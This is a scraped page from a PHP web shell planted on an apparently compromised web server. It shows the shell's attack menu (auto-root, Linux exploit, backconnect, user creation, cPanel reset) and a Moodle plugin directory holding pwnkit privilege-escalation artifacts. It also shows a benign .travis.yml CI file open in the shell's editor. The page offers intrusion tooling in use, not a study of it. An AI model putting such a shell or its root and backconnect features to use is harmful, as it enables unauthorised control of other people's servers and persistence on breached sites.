Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.70.127.214
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
mod /
hvp /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
amd
[ DIR ]
drwxr-xr-x
backup
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxr-xr-x
db
[ DIR ]
drwxr-xr-x
editor
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
library
[ DIR ]
drwxr-xr-x
pix
[ DIR ]
drwxr-xr-x
reporting
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
.eslintrc
5.77
KB
-rw-r--r--
.gitignore
49
B
-rw-r--r--
.gitmodules
323
B
-rw-r--r--
.jshintrc
163
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
.travis.yml
4.8
KB
-rw-r--r--
LICENSE
17.62
KB
-rw-r--r--
README.md
2.39
KB
-rw-r--r--
ajax.php
16.43
KB
-rw-r--r--
autoloader.php
3.68
KB
-rw-r--r--
content_hub_registration.php
2.03
KB
-rw-r--r--
dataviews.js
1.31
KB
-rw-r--r--
editor.js
1.25
KB
-rw-r--r--
embed.php
3.53
KB
-rw-r--r--
grade.php
5
KB
-rw-r--r--
index.php
4.25
KB
-rw-r--r--
lib.php
16.49
KB
-rw-r--r--
library_list.php
5.1
KB
-rw-r--r--
locallib.php
25.48
KB
-rw-r--r--
mod_form.php
18.76
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
renderer.php
3.1
KB
-rw-r--r--
review.php
6.74
KB
-rw-r--r--
settings-hide-key.js
1018
B
-rw-r--r--
settings.php
7.2
KB
-rw-r--r--
share.php
5.63
KB
-rw-r--r--
styles.css
2.18
KB
-rw-r--r--
thirdpartylibs.xml
542
B
-rw-r--r--
upgrade_content_page.php
4.95
KB
-rw-r--r--
version.php
1.06
KB
-rw-r--r--
view.css
1.74
KB
-rw-r--r--
view.php
3.37
KB
-rw-r--r--
xapi-collector.js
5.67
KB
-rw-r--r--
xapi-custom-report.css
1.39
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .travis.yml
# This is the language of our project. language: php # Installs the required version of Firefox for Behat, an updated version # of PostgreSQL and extra APT packages. Java 8 is only required # for Mustache command. addons: postgresql: "9.5" services: - mysql - postgresql - docker # Cache NPM's and Composer's caches to speed up build times. cache: directories: - $HOME/.composer/cache - $HOME/.npm # Determines which versions of PHP to test our project against. Each version # listed here will create a separate build and run the tests against that # version of PHP. php: - 7.0 - 7.1 - 7.2 - 7.3 - 7.4 # This section sets up the environment variables for the build. env: global: # This line determines which version branch of Moodle to test against. - MOODLE_BRANCH=MOODLE_39_STABLE - IGNORE_PATHS=lang,editor,library,reporting # This matrix is used for testing against multiple databases. So for # each version of PHP being tested, one build will be created for each # database listed here. EG: for PHP 5.6, one build will be created # using PHP 5.6 and pgsql. In addition, another build will be created # using PHP 5.6 and mysqli. matrix: - DB=pgsql - DB=mysqli # Optionally, it is possible to specify a different Moodle repo to use # (git://github.com/moodle/moodle.git is used by default): # - MOODLE_REPO=git://github.com/username/moodle.git # This lists steps that are run before the installation step. before_install: # This disables XDebug which should speed up the build. - phpenv config-rm xdebug.ini # Currently we are inside of the clone of your repository. We move up two # directories to build the project. - cd ../.. # Install this project into a directory called "ci". - composer create-project -n --no-dev --prefer-dist moodlehq/moodle-plugin-ci ci ^3 # Update the $PATH so scripts from this project can be called easily. - export PATH="$(cd ci/bin; pwd):$(cd ci/vendor/bin; pwd):$PATH" # This lists steps that are run for installation and setup. install: # Run the default install. The overview of what this does: # - Clone the Moodle project into a directory called moodle. # - Create a data directory called moodledata. # - Create Moodle config.php, database, etc. # - Copy your plugin(s) into Moodle. # - Run Composer install within Moodle. # - Run NPM install in Moodle and in your plugin if it has a "package.json". # - Run "grunt ignorefiles" within Moodle to update ignore file lists. # - If your plugin has Behat features, then Behat will be setup. # - If your plugin has unit tests, then PHPUnit will be setup. - moodle-plugin-ci install # This lists steps that are run for the purposes of testing. Any of # these steps can be re-ordered or removed to your liking. And of # course, you can add any of your own custom steps. script: # This step lints your PHP files to check for syntax errors. - moodle-plugin-ci phplint # This step runs the PHP Copy/Paste Detector on your plugin. # This helps to find code duplication. - moodle-plugin-ci phpcpd # This step runs the PHP Mess Detector on your plugin. This helps to find # potential problems with your code which can result in # refactoring opportunities. - moodle-plugin-ci phpmd # This step runs the Moodle Code Checker to make sure that your plugin # conforms to the Moodle coding standards. It is highly recommended # that you keep this step. - moodle-plugin-ci codechecker # This step runs Moodle PHPDoc checker on your plugin. # - moodle-plugin-ci phpdoc # This step runs some light validation on the plugin file structure # and code. Validation can be plugin specific. - moodle-plugin-ci validate # This step validates your plugin's upgrade steps. - moodle-plugin-ci savepoints # This step validates the HTML and Javascript in your Mustache templates. # - moodle-plugin-ci mustache # This step runs Grunt tasks on the plugin. By default, it tries to run # tasks relevant to your plugin and Moodle version, but you can run # specific tasks by passing them as options, # EG: moodle-plugin-ci grunt -t task1 -t task2 # - moodle-plugin-ci grunt # This step runs the PHPUnit tests of your plugin. If your plugin has # PHPUnit tests, then it is highly recommended that you keep this step. - moodle-plugin-ci phpunit # This step runs the Behat tests of your plugin. If your plugin has # Behat tests, then it is highly recommended that you keep this step. # There are two important options that you may want to use: # - The auto rerun option allows you to rerun failures X number of times, # default is 2, EG usage: --auto-rerun 3 # - The dump option allows you to print the failure HTML to the console, # handy for debugging, EG usage: --dump # - The suite option allows you to set the theme to use for behat test. If # not specified, the default theme is used, EG usage: --suite boost
Close